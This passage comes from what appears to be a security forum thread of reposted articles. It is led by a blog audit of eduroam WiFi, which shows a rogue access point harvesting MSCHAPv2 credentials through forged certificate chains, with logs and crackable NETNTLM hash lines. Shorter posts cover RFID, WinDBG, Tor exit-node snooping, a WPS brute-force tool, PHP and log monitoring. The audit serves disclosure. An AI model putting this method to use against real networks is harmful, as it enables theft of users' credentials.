prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate by the access point and then checks with the configured CA if it is valid. But valid for what address? Normally, the CN (common name) in the certificate is checked with the used address. But with what address is the certificate provided by the radius server checked? A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it. The certificate for the rogue access point and the CA got the following values: CA: C=DE ST=Some-State O=h4des.org CN=sqall certificate for rogue access point: C=DE ST=Some-State O=h4des.org CN=some-rogue-access-point emailAddress=sqall You can see, that the CN field got "some-rogue-access-point" as value, which is no address for a radius server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file: ca_cert="./CA.cert.pem" And what happened? wpa_supplicant connects with the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate. wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check for this CA. The device connects with the rogue access point without any problems and also discloses my user credentials. As a summary for this test: the certificate for the rogue access point just have to be a valid certificate signed by the used CA. It does not matter for which address the certificate was issued, it just have to be valid. Normally, the problem for forging a valid host in an TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is, that a CA does not sign your certificate request unless you own the domain/address (or rather the CA should not). But if you can use any address in the CN, it is no problem to get a signed certificate. Here lies the second reason for eduroam being insecure by design. I do not know if the vendor got a service to sign your own certificates with the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem to configure a rogue access point which can not be distinguished from a valid one. It should be mentioned, that the address of the radius server can be configured in the iDevice profiles. But I have no iDevice and so I can not check if the CN of the certificate provided by the radius server is checked against the configured address. In wpa_supplicant for example I did not found any configuration option for the address of the radius server. But I found the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options. Test with an own intermediate CA After an arbitrary signed certificate was tested, the next interesting thing is a certificate signed by an intermediate CA. When we look at the wpa_supplicant output when connecting to a benign access point: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] we can see, that the certificate is signed by the CA of my university (and not the "Deutsche_Telekom_Root_CA_2" CA). Actually, the chain is "Deutsche_Telekom_Root_CA_2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was, it could be difficult (and perhaps costly) to get a signed certificate by the "Deutsche_Telekom_Root_CA_2" CA, but a signed certificate by the university is very easy as student or university staff. So, I created my own intermediate CA signed by my formerly created CA and generate a new certificate for my rogue eduroam access point. The values for all these CAs and the certificate are: CA: C=DE ST=Some-State O=h4des.org CN=sqall intermediate CA: C=DE ST=Some-Other-State O=h4des.org OU=intermediate CN=it is sqall again certificate for rogue access point: C=DE ST=Some-Other-State O=h4des.org OU=intermediate certificate CN=again sqall Again, wpa_supplicant is tried first. The settings are the same as for the test before (this means wpa_supplicant uses the certificate of the CA to check the validity of the rogue access point). The output of wpa_supplicant shows, that the rogue access point offers my new certificate signed by the intermediate CA and that the client connects without any problems: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request The log file of my modified radius server shows me the MSCHAPv2 challenge-response values: mschap: Sat Jan 11 19:42:27 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 43:cd:42:0f:a6:14:46:4e response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid). As a summary for this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, it is the third reason for eduroam being insecure by design. It might be difficult to get a signed certificate by the main CA. But when intermediate CAs are in place, it could be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA and this signed the CA of my university. I think that the "DFN-Verein PCA Global - G01" intermediate CA signed a lot of university CAs. And a lot of universities (like mine) offer the service to sign your server certificate (when it is inside the namespace of the university). When you are able to get a certificate that is signed by anyone of the CAs in the chain, you can forge a valid eduroam access point. Test with a server certificate signed by my university Ok, all the talk about "uhh, it is insecure with this used public key infrastructure!" and "it is theoretically possible to ...", let's break it! I helped the university to set up some servers. So I have access to a certificate signed by the university CA. And I configured my rogue access point to use this certificate. This certificate obviously does not have "radius.ruhr-uni-bochum.de" as CN value. It is valid for other addresses which I censored out. We saw in the tests above that the value in the CN field does not matter. First I tried wpa_supplicant. Now with the settings that should be used for a valid eduroam access point. This is the output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request And we can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials: mschap: Sun Jan 12 01:24:03 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 28:f5:bf:4d:3f:fe:bf:a2 response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94 john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994 The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact that happened when I just started my rogue access point with the valid certificate: the mobile device of one of my neighbors connected instantly to my rogue access point (his or her login credentials are from a different university than mine). One has to love all the folks that have their WiFi always turned on Test with a client certificate signed by my university My university has the service to provide any student with a client certificate signed by the university's CA. My idea was "most clients do not provide options for the radius server address, perhaps they do not check if the certificate is only for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do (I did not test others). I used a certificate with this key usages and signed by my university's CA: X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment X509v3 Extended Key Usage: TLS Web Client Authentication, E-mail Protection So, when I try to connect with wpa_supplicant I get this output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication starte wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose' SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed So we can clearly see, that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4. It just tells me authentication error. To summarize this part: this does not have anything to do with the design or security of the eduroam network. This is only an implementation thing of the used client software. I just tested it with the hope to find a "fuck up" of some WiFi clients, but was disappointed Conclusion In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which is not to fix without changing the whole public key infrastructure. For me it seems that when they were designing the whole eduroam network they just thought "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet. So let us just use it too!". Using different CAs in different countries which signed a lot of intermediate CAs is not a good idea when the clients do not/can not check the address of the radius server which provides the certificate. Every certificate that is signed by one of the intermediate CAs or the used top CA is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network to which a client from a different country could also connect (for example, a client from Germany could connect to an eduroam access point when he is in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country). Or rather this is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL? The next thing is, a lot of universities (like mine) provide flawed tutorials to configure WiFi clients for eduroam. Even when MSCHAPv2 is available, the tutorials often used PAP to authenticate the client. PAP sends all user credentials in plaintext whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate. This means, when an user configured her client with the help of the flawed tutorials and uses eduroam, she could just as well shout out her credentials everytime she is connecting to the WiFi network. The really bad thing about this is, when an adversary gets the user credentials of someone, he often has the user credentials for other services of the university as well because the same account is used (in the case of my university for the email account, the MSDNAA account, ...). I heared of some universities that even use these credentials to let the student subscribe/unsubscribe for exams of the offered courses. The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute force the password when he successfully forges an eduroam access point. This means the security comes from the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ). In my opinion, the only way to really fix this issue is to use an own public key infrastruture for the whole eduroam WiFi design. When an own CA is used for eduroam (perhaps with intermediate CAs for universities to use only for certificates that are used by the eduroam infrastructure) there is no way to forge a valid eduroam access point for an attacker, because he can not get a signed certificate for it. When the clients set up the CA in their eduroam settings, they would not connect to rogue access points. Even if the client is configured to use PAP instead of MSCHAPv2, the user credentials are secure in a way. But the own public key infrastructure would only work when the clients are configured correctly and this means that the universities have to fix their tutorials for the eduroam WiFi first. I wrote my university about this issue and they fixed some tutorials (for example for Android). But not all are fixed (for example for wpa_supplicant) and I do not think that they will fix all of them. But even so, fixing the tutorials will not help when a lot of students and university staff already applied the flawed configurations. Errata In the time of writing this article, I have not tested this statement. I just based it on the settings you can made in an access point, the statement of my university and the statement my friend had made. However, yesterday night I drove to the next city to test this statement at an other university (the TU Dortmund). Honestly, I did not expect this result: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:14:a8:14:86:f1 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my university. This means that my WiFi client still connects to the radius server of my university. I did not expect that (and have not really an idea how this infrastructure works exactly). Unfortunately, I have no way to test it with an university in a foreign country. Nevertheless, my conclusion which states that an own CA should have been used for the eduroam infrastructure remains the same. Sursa: eduroam WiFi security audit or why it is broken by design - sqall's blog
  11. Near error-free wireless detection made possible Date: January 23, 2014 Source: University of Cambridge Summary: A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 percent accuracy over a much wider range than current systems. A new long-range wireless tag detection system, with potential applications in health care, environmental protection and goods tracking, can pinpoint items with near 100 per cent accuracy over a much wider range than current systems. The accuracy and range of radio frequency identification (RFID) systems, which are used in everything from passports to luggage tracking, could be vastly improved thanks to a new system developed by researchers at the University of Cambridge. The vastly increased range and accuracy of the system opens up a wide range of potential monitoring applications, including support for the sick and elderly, real-time environmental monitoring in areas prone to natural disasters, or paying for goods without the need for conventional checkouts. The new system improves the accuracy of passive (battery-less) RFID tag detection from roughly 50 per cent to near 100 per cent, and increases the reliable detection range from two to three metres to approximately 20 metres. The results are outlined in the journal IEEE Transactions on Antennas and Propagation. RFID is a widely-used wireless sensing technology which uses radio waves to identify an object in the form of a serial number. The technology is used for applications such as baggage handling in airports, access badges, inventory control and document tracking. RFID systems are composed of a reader and a tag, and unlike conventional bar codes, the reader does not need to be in line of sight with the tag in order to detect it, meaning that tags can be embedded inside an object, and that many tags can be detected at once. Additionally, the tags require no internal energy source or maintenance, as they get their power from the radio waves interrogating them. "Conventional passive UHF RFID systems typically offer a lower useful read range than this new solution, as well as lower detection reliability," said Dr Sithamparanathan Sabesan of the Centre for Photonic Systems in the Department of Engineering. "Tag detection accuracy usually degrades at a distance of about two to three metres, and interrogating signals can be cancelled due to reflections, leading to dead spots within the radio environment." Several other methods of improving passive RFID coverage have been developed, but they do not address the issues of dead spots. However, by using a distributed antenna system (DAS) of the type commonly used to improve wireless communications within a building, Dr Sabesan and Dr Michael Crisp, along with Professors Richard Penty and Ian White, were able achieve a massive increase in RFID range and accuracy. By multicasting the RFID signals over a number of transmitting antennas, the researchers were able to dynamically move the dead spots to achieve an effectively error-free system. Using four transmitting and receiving antenna pairs, the team were able to reduce the number of dead spots in the system from nearly 50 per cent to zero per cent over a 20 by 15 metre area. In addition, the new system requires fewer antennas than current technologies. In most of the RFID systems currently in use, the best way to ensure an accurate reading of the tags is to shorten the distance between the antennas and the tags, meaning that many antennas are required to achieve an acceptable accuracy rate. Even so, it is impossible to achieve completely accurate detection. But by using a DAS RFID system to move the location of dead spots away from the tag, an accurate read becomes possible without the need for additional antennas. The team is currently working to add location functionality to the RFID DAS system which would allow users to see not only which zone a tagged item was located in, but also approximately where it was within that space. The system, recognised by the award of the 2011 UK RAEng/ERA Innovation Prize, is being commercialised by the Cambridge team. This will allow organisations to inexpensively and effectively monitor RFID tagged items over large areas. The research was funded by the Engineering and Physical Sciences Research Council (EPSRC) and Boeing. Sursa: Near error-free wireless detection made possible -- ScienceDaily
  12. [h=3]Getting Started with WinDBG - Part 1[/h]By Brad Antoniewicz. WinDBG is an awesome debugger. It may not have a pretty interface or black background by default, but it still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you off the ground running. This is part one of a multipart series, here's our outline of whats in store: Part 1 - Installation, Interface, Symbols, Remote/Local Debugging, Help, Modules, and Registers Part 2 - Breakpoints Part 3 - Inspecting Memory, Stepping Through Programs, and General Tips and Tricks In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory. [h=1]Installation[/h] Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both. [h=2]Windows 8[/h] For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK) You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG. This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The later will be the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future. From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download". Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then next through that install. Then you're all ready to go! [h=2]Windows 7 and Below[/h] For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option. My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer which makes future debugging efforts a heck of lot easier. That's what I'll do here. Once the installation completes, you'll should have the redistributable for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory. From there the installation is pretty simple, just copy the appropriate redistributable to the system you're debugging and then click through the installation. Articol complet: http://blog.opensecurityresearch.com/2013/12/getting-started-with-windbg-part-1.html
  13. Who is spying on Tor network exit nodes from Russia? by paganinip on January 23rd, 2014 Researchers Winter and Lindskog identified 25 nodes of Tor network that tampered with web traffic, decrypted the traffic, or censored websites. Two researchers, Philipp Winter and Stefan Lindskog of Karlstad University in Sweden, presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior, it has been discovered that a not specified Russian entity is eavesdropping nodes at the edge of the Tor network. The researchers used a custom tool for their analysis and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. On the overall nodes compromised, 19 were tampered using a man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly. Tor network anonymizes user’s web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 “exit nodes.” The study proposed is based on two fundamental considerations: User’s traffic is vulnerable at the exit nodes. For bad actors, the transit through an exit node of the traffic exposes it to eavesdrop. Very popular was the case of WikiLeaks, that was initially launched with documents intercepted from Tor network eavesdropping on Chinese hackers through a bugged exit node. Tor nodes are run by volunteers that can easily set up and taken down their servers every time they need and want. The attackers in these cases adopted a bogus digital certificate to access traffic content, for the remaining 6 cases it has been observed that impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passive eavesdropped on unencrypted web traffic on the exit nodes, by checking the digital certificates used over Tor connections against the certificates used in direct “clear-web sessions”, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers control the Russian nodes access to the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity “Main Authority.” It appears as a well-organized operation, the researchers noted that blacklisting the “Main Authority” Tor nodes, new ones using the same certificate would set-up by the same entity. It is not clear who is behind the attack, Winter and Lindskog believe that the spying operation was conducted by isolating individuals instead government agency because the technique adopted is too noisy, the attackers used a self-signed certificate that causes browser warning to Tor users. “It was actually done pretty stupidly,” says Winter. It must be also considered that Intelligence agencies, including the NSA are spending a great effort to infiltrate the Tor network, one of the documents leaked by Edward Snowden on the US surveillance expressly refers a project, codenamed Tor Stinks, to track profiles in the deep web. Despite the high interest in Tor networks and its potentialities, the network is considerably the best way to protect user’s anonymity online, and governments don’t want this. Pierluigi Paganini (Security Affairs – Tor network, Russia) Sursa: Who is spying on Tor network exit nodes from Russia?
  14. Retrieve WPA/WPA2 passphrase from a WPS enabled acess point. [h=1]OVERVIEW[/h] Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture. Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success. Source: https://github.com/bdpurcell/bully
  15. [h=1]PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB[/h] January 25th, 2014, 14:45 GMT · By Silviu Stahie - PHP logo PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1. PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more. According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking have been added. Also, support for large(>2GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available. You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia. Sursa: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB
  16. Spotting the Adversary with Windows Event Log Monitoring Author: National Security Agency/Central Security Service Contents 1 Introduction ................................................................................................................ .......................... 1 2 Deployment................................................................................................................... ........................ 1 2.1 Ensuring Integrity of Event Logs ................................................................................................................... 2 2.2 Environment Requirements ...................................................................................................... ................... 3 2.3 Log Aggregation on Windows Server 2008 R2 ............................................................................................. 4 2.4 Configuring Source Computer Policies .......................................................................................... ............... 9 2.5 Disabling Windows Remote Shell ................................................................................................ ............... 15 2.6 Firewall Modification ......................................................................................................... ........................ 15 2.7 Restricting WinRM Access ...................................................................................................... .................... 18 2.8 Disabling WinRM and Windows Collector Service ..................................................................................... 19 3 Hardening Event Collection................................................................................................... .............. 20 3.1 WinRM Authentication Hardening Methods ............................................................................................. 20 3.2 Secure Sockets Layer and WinRM .............................................................................................................. 24 4 Recommended Events to Collect ........................................................................................................ 24 4.1 Application Whitelisting ...................................................................................................... ....................... 25 4.2 Application Crashes ........................................................................................................... ......................... 25 4.3 System or Service Failures .................................................................................................... ...................... 25 4.4 Windows Update Errors ......................................................................................................... .................... 26 4.5 Windows Firewall .............................................................................................................. ......................... 26 4.6 Clearing Event Logs ........................................................................................................... ......................... 26 4.7 Software and Service Installation ............................................................................................. .................. 27 4.8 Account Usage ................................................................................................................. .......................... 27 4.9 Kernel Driver Signing ......................................................................................................... ......................... 28 4.10 Group Policy Errors ........................................................................................................... ......................... 29 4.11 Windows Defender Activities ..................................................................................................................... 29 4.12 Mobile Device Activities ...................................................................................................... ....................... 30 4.13 External Media Detection ...................................................................................................... .................... 31 4.14 Printing Services ............................................................................................................. ............................ 32 4.15 Pass the Hash Detection........................................................................................................ ..................... 32 4.16 Remote Desktop Logon Detection ................................................................................................ ............. 33 5 Event Log Retention ......................................................................................................... ................... 34 6 Final Recommendations........................................................................................................ .............. 35 7 Appendix .................................................................................................................... ......................... 35 7.1 Subscriptions ................................................................................................................. ............................. 35 7.2 Event ID Definitions .......................................................................................................... .......................... 37 7.3 Windows Remote Management Versions.................................................................................................. 38 7.4 WinRM 2.0 Configuration Settings ............................................................................................................. 40 7.5 WinRM Registry Keys and Values ................................................................................................ ............... 43 7.6 Troubleshooting ............................................................................................................... .......................... 44 8 Works Cited ................................................................................................................. ........................ 48 Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf
  17. Improving the Human Firewall Introduction Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide – it is pointless to expend millions of dollars on the most recent software and hardware to defend the corporate networks against all kinds of internal and external threats only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: “A chain is only as strong as its weakest link” and it is tightly related to information security as attackers test all possible points of access for vulnerabilities and usually choose the least resistant one. A report from Wisegate, a peer-based IT knowledge service, states that the threat from inner computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claim that user security awareness was a top concern in 2013. Most companies already do training and have a relatively high expenditure on computer-based training programs. These trainings just do not prove as efficient as they are planned to be. The key issue here is to differentiate between training and education – training employees involves actions while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results on the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that it permits them to act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program. This cannot be achieved merely by conducting training, leaving notes and hanging up posters. Isn’t the average Internet user already aware of the security issues that he might be confronted with? To illustrate our point, we looked at the trends in Google search for the following keywords: The following results were shown: The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the word social engineering for most periods due to its low demand. We see from the red and purple curve above that between 2004 and 2007 many Internet users demanded keygens and torrents to get illegal access to paid software (at a generally declining rate) but their awareness of possible implications of keygens such as malware and social engineering remained relatively stagnant. From year 2008 up to now we see a slight increase in the search tendency for malware and phishing while the query tendency for keygen and torrents have been falling at an increasing rate and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet. Nonetheless, this decline of piracy and risky behavior is also due to other reasons such as better enforcement of copyright laws, removal of access to websites with illegal contents by ISPs, closure of online businesses operating in the grey market by governments, inter alia. However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as demanded a keyword as virus and more demanded than keygen, torrents, social engineering, phishing, malware. It appears that the end-users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords virus and anti-virus are more trending than torrents and multiple times more popular than social 